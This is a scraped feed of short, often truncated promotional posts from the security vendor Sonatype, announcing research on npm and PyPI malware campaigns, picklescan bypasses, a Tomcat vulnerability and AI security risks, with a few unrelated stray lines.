The Latest on npm Supply Chain Attack

🚨 Another active attack targeting npm developers — and this one spreads itself. We break down the evolving #ShaiHulud campaign, a new wave of self-propagating malware targeting #npm publishers: ➡️ Over 180+ compromised packages tracked so far ➡️ Multi-stage payloads exfiltrate

🚨 New research: Lazarus Group targets developers through open source malware Since January, Sonatype has uncovered 234 malicious packages tied to the North Korea-backed group — deployed via npm and PyPI to exfiltrate secrets, drop payloads, and surveil developers. 📦 120+ used

Palantir 🤝 NVIDIA "This is probably the single most important enterprise stack in the world, the Palantir Ontology."

In finance, trust is everything, and that extends to your #softwaresupplychain. 🔐 Sonatype is trusted by over 70% of the Fortune 100, including leading global banks and insurers, to secure their open source components and reduce software risk at scale. Explore how Sonatype

LLMs are powerful, but their outputs aren’t always safe. Improper output handling can lead to code injection, outages & compliance failures. Learn how Sonatype helps teams validate LLM responses before they reach production: https://t.co/1LLAKOjcUH #AIsecurity #OWASP #DevSecOps

Security and speed don’t have to compete. Discover how Sonatype enables teams to streamline software composition analysis (#SCA) with automated solutions that scale, reducing manual effort while enhancing their risk posture. 🔐 Read the blog: https://t.co/nJ4kbHcUAe #DevSecOps

Frosted outside. Citrus inside.

Java changed everything — igniting the open source revolution and redefining modern software development. In this deep dive from @thenewstack, Sonatype CTO and co-founder Brian Fox reflects on the early days of open source and the movement that followed, in conversation with

Streamline security without slowing innovation. Discover how one financial enterprise used Sonatype Lifecycle to scale security, boost efficiency, and reduce risk: 📈 3x faster onboarding 🔍 335% more scans 🛡️ 25% fewer critical risks Read the full story:

Data and model poisoning attacks are on the rise — and they threaten the integrity of AI at its core. In part two of our OWASP LLM Top 10 blog series, we break down how Sonatype helps organizations detect and prevent poisoning attacks before they compromise your models. 🔍

Are your AI models compliant and secure? Sonatype’s discovery of four picklescan bypasses is a wake-up call for any team using open source AI. Insecure models can silently introduce risk into your environment—long before they reach production. Read the whitepaper to strengthen

Software supply chain security isn’t just an IT issue anymore — it’s a boardroom priority. With attacks on open source rising 156% in 2024 and new regulations taking effect, executives must lead with proactive strategies that balance innovation, risk, and compliance. Explore

🚨 Software attacks are on the rise — and regulators are responding. https://t.co/0elGVb4UmN Our latest executive brief with The Futurum Group explains why 2025 is a defining year for software security, compliance, and board-level accountability. Learn what every executive

A new Apache Tomcat vulnerability (CVE-2025-24813) was exploited within hours of disclosure, and the threat is real and growing. Learn why this flaw is so dangerous, and what teams must do to stay protected. https://t.co/Mxf2gxXZDq #ApacheTomcat #CyberSecurity

Open source malware isn’t slowing down. It’s getting smarter. Sonatype’s Open Source Malware Index Q1 2025 reveals a sharp rise in data exfiltration attacks targeting developers — and the stakes are only getting higher. 📈 17,954 new malicious packages identified 📤 56% of them

🚨 A data exfiltration campaign was discovered with 10 popular npm crypto packages hijacked — now repurposed to steal sensitive environment variables from unsuspecting developers. https://t.co/kapBXybmmz Some of these components have been trusted for nearly a decade and

AI-driven supply chains need secure foundations. Gartner® highlights how AI-powered software solutions are the future of supply chain management, delivering efficiency, transparency, and resilience. https://t.co/Em4q24CrAe Sonatype enables organizations to secure their software

Malware attacks against government organizations are escalating—fast. 🚨 https://t.co/oncLgQhjCo In 2024 alone, over 300,000 malware attacks targeted federal agencies, making up 67.31% of all attempted attacks blocked by Sonatype. Traditional security measures are no longer

We’re proud to announce that Sonatype has been recognized by the 2025 Cybersecurity Excellence Awards! These wins highlight our commitment to securing the software supply chain by providing intelligent automation, advanced SBOM management, and proactive risk mitigation. Sonatype

Sonatype has discovered and responsibly disclosed four vulnerabilities in picklescan, a tool designed to detect unsafe Python pickle files in AI/ML models. These vulnerabilities, now fixed, could allow attackers to slip malicious models past its defenses. This discovery is a

Fake IP checker utilities like “node-request-ip” are spreading trojans and crypto stealers across Windows, Linux, and macOS. Sonatype detected and blocked these threats—but it’s a reminder that attackers are evolving. Read the full breakdown and stay ahead of emerging threats: